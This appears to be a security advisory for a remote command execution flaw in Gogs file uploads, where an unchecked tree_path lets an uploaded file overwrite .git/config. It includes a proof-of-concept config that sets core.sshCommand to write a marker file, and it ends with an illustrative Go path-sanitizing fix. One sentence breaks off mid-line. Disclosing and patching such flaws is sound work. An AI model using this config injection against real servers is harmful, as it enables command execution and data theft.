Remote Command Execution in uploading repository file in gogs/gogs
Mar 11th 2022
When uploading a file to a repository in Gogs, the tree_path parameter is not validated. An attacker can set tree_path=/.git/ to write the uploaded file into the .git/config file and set core.sshCommand, which leads to a remote command execution vulnerability.
Proof of Concept
Create a repository in Gogs and upload a file named config to the repository through the web page, with the following contents:
    [core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
        ignorecase = true
        precomposeunicode = true
        sshCommand = echo pwnned > /tmp/poc
    [remote "origin"]
        url = firstname.lastname@example.org:torvalds/linux.git
        fetch = +refs/heads/*:refs/remotes/origin/*
    [branch "master"]
        remote = origin
        merge = refs/heads/master
Intercept the HTTP POST form submission and set the parameter tree_path=/.git/ in the request body.
Then a file with the text pwnned is created in
This vulnerability allows executing commands on the remote server and gaining a privileged user account, which leads to sensitive data exposure, identity theft, etc.
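The missing check is the one that the upload handler should perform on tree_path before writing anything into the working tree. The following Go helper is added here as an illustration and is not Gogs' own code: CleanTreePath and ErrInvalidTreePath are hypothetical names. It normalizes a user-supplied tree_path, prevents ".." from escaping the tree root, and rejects any path component named .git (case-insensitively, since a case-insensitive filesystem would still resolve .GIT to the real directory).

```go
package main

import (
	"errors"
	"fmt"
	"path"
	"strings"
)

// ErrInvalidTreePath is returned when an upload must not be written to the
// requested location (hypothetical name, not a Gogs identifier).
var ErrInvalidTreePath = errors.New("tree_path points outside the working tree or into .git")

// CleanTreePath normalizes a user-supplied tree_path and rejects values that
// would escape the repository working tree or land inside its .git directory.
// It returns the cleaned path relative to the tree root ("" means the root).
func CleanTreePath(raw string) (string, error) {
	// Treat backslashes as separators so "..\.git" cannot slip past on any OS.
	p := strings.ReplaceAll(raw, "\\", "/")
	// Anchoring at "/" before Clean makes ".." unable to climb above the root;
	// the leading "/" is then stripped to get a tree-relative path.
	p = strings.TrimPrefix(path.Clean("/"+p), "/")
	for _, seg := range strings.Split(p, "/") {
		// Reject any component that would reach the repository metadata,
		// e.g. "/.git/" from the advisory or "sub/.GIT/config".
		if strings.EqualFold(seg, ".git") {
			return "", ErrInvalidTreePath
		}
	}
	return p, nil
}

func main() {
	// Constructed sample inputs: the advisory's value plus a few variants.
	for _, in := range []string{"/.git/", "../.git/hooks", "sub/.GIT/config", "docs/", ""} {
		out, err := CleanTreePath(in)
		fmt.Printf("%q -> %q, err=%v\n", in, out, err)
	}
}
```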